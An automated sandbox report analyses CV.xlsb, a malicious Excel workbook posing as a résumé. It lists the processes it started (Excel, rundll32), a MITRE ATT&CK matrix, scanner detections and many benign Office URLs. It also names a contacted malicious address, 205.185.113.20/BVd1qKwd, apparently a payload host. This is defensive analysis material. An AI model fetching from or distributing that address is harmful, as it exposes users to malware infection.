Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: rundll32.exe, 00000002.00000002.249917392.0000000004DB0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000002.00000002.249917392.0000000004DB0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000002.00000002.249917392.0000000004DB0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000002.00000002.249917392.0000000004DB0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: rundll32.exe, 00000002.00000002.249917392.0000000004DB0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000002.00000002.249917392.0000000004DB0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000002.00000002.249917392.0000000004DB0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000002.00000002.249917392.0000000004DB0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting2DLL Side-Loading1Process Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsDLL Side-Loading1Rundll321LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting2NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
CV.xlsb3%VirustotalBrowse
CV.xlsb12%ReversingLabsDocument-Office.Trojan.Heuristic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://205.185.113.20/BVd1qKwd11%VirustotalBrowse
http://205.185.113.20/BVd1qKwd0%Avira URL Cloudsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://205.185.113.20/BVd1qKwdtrue
  • 11%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
    high
    https://login.microsoftonline.com/2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
      high
      https://shell.suite.office.com:14432C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
          high
          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
            high
            https://cdn.entity.2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            https://api.addins.omex.office.net/appinfo/query2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
              high
              https://wus2-000.contentsync.2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://clients.config.office.net/user/v1.0/tenantassociationkey2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                high
                https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                  high
                  https://powerlift.acompli.net2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://rpsticket.partnerservices.getmicrosoftkey.com2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://lookup.onenote.com/lookup/geolocation/v12C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                    high
                    https://cortana.ai2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                      high
                      https://cloudfiles.onenote.com/upload.aspx2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                        high
                        https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                          high
                          https://entitlement.diagnosticssdf.office.com2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                            high
                            https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                              high
                              https://api.aadrm.com/2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              https://ofcrecsvcapi-int.azurewebsites.net/2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                high
                                https://api.microsoftstream.com/api/2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                  high
                                  https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                    high
                                    https://cr.office.com2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                      high
                                      https://portal.office.com/account/?ref=ClientMeControl2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                        high
                                        https://ecs.office.com/config/v2/Office2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                          high
                                          https://graph.ppe.windows.net2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                            high
                                            https://res.getmicrosoftkey.com/api/redemptionevents2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://powerlift-frontdesk.acompli.net2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://tasks.office.com2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                              high
                                              https://officeci.azurewebsites.net/api/2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/work2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                high
                                                https://store.office.cn/addinstemplate2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://wus2-000.pagecontentsync.2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                  high
                                                  https://globaldisco.crm.dynamics.com2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                    high
                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                      high
                                                      https://store.officeppe.com/addinstemplate2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://dev0-api.acompli.net/autodetect2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.odwebp.svc.ms2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://api.powerbi.com/v1.0/myorg/groups2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                        high
                                                        https://web.microsoftstream.com/video/2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                          high
                                                          https://graph.windows.net2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                            high
                                                            https://dataservice.o365filtering.com/2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://officesetup.getmicrosoftkey.com2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://analysis.windows.net/powerbi/api2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                              high
                                                              https://prod-global-autodetect.acompli.net/autodetect2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://outlook.office365.com/autodiscover/autodiscover.json2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                high
                                                                https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                  high
                                                                  https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                    high
                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                      high
                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                        high
                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                          high
                                                                          http://weather.service.msn.com/data.aspx2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                            high
                                                                            https://apis.live.net/v5.0/2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                              high
                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                high
                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                  high
                                                                                  https://management.azure.com2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                    high
                                                                                    https://outlook.office365.com2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                      high
                                                                                      https://incidents.diagnostics.office.com2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/ios2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmedia2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.com2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                high
                                                                                                https://api.office.net2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.com2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.com2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                          high
                                                                                                          https://autodiscover-s.outlook.com2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/log2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                high
                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                  high
                                                                                                                  https://management.azure.com/2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                    high
                                                                                                                    https://ncus-000.contentsync.2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://login.windows.net/common/oauth2/authorize2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                      high
                                                                                                                      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://graph.windows.net/2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                        high
                                                                                                                        https://api.powerbi.com/beta/myorg/imports2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                          high
                                                                                                                          https://devnull.onenote.com2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                            high
                                                                                                                            https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                              high
                                                                                                                              https://messaging.office.com/2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                                high
                                                                                                                                https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://augloop.office.com/v22C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://skyapi.live.net/Activity/2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://clients.config.office.net/user/v1.0/mac2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://dataservice.o365filtering.com2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://onedrive.live.com2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://ovisualuiapp.azurewebsites.net/pbiagave/2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://visio.uservoice.com/forums/368202-visio-on-devices2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://directory.services.2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://login.windows-ppe.net/common/oauth2/authorize2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://loki.delve.office.com/api/v1/configuration/officewin32/2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://onedrive.live.com/embed?2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://augloop.office.com2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drfalse
                                                                                                                                                    high

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    205.185.113.20
                                                                                                                                                    unknownUnited States
                                                                                                                                                    53667PONYNETUSfalse

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                    Analysis ID:319185
                                                                                                                                                    Start date:18.11.2020
                                                                                                                                                    Start time:04:49:16
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 4m 51s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Sample file name:CV.xlsb
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Number of analysed new started processes analysed:27
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal76.expl.evad.winXLSB@3/4@0/1
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HDC Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xlsb
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.43.193.48, 52.109.32.27, 52.109.8.24, 52.109.12.21, 2.20.84.85, 51.11.168.160, 67.27.233.126, 8.253.204.120, 8.248.115.254, 67.27.233.254, 67.26.139.254, 20.54.26.129, 51.104.139.180, 92.122.213.247, 92.122.213.194
                                                                                                                                                    • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, config.officeapps.live.com, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    No simulations

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    205.185.113.20myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/BVd1qKwd
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
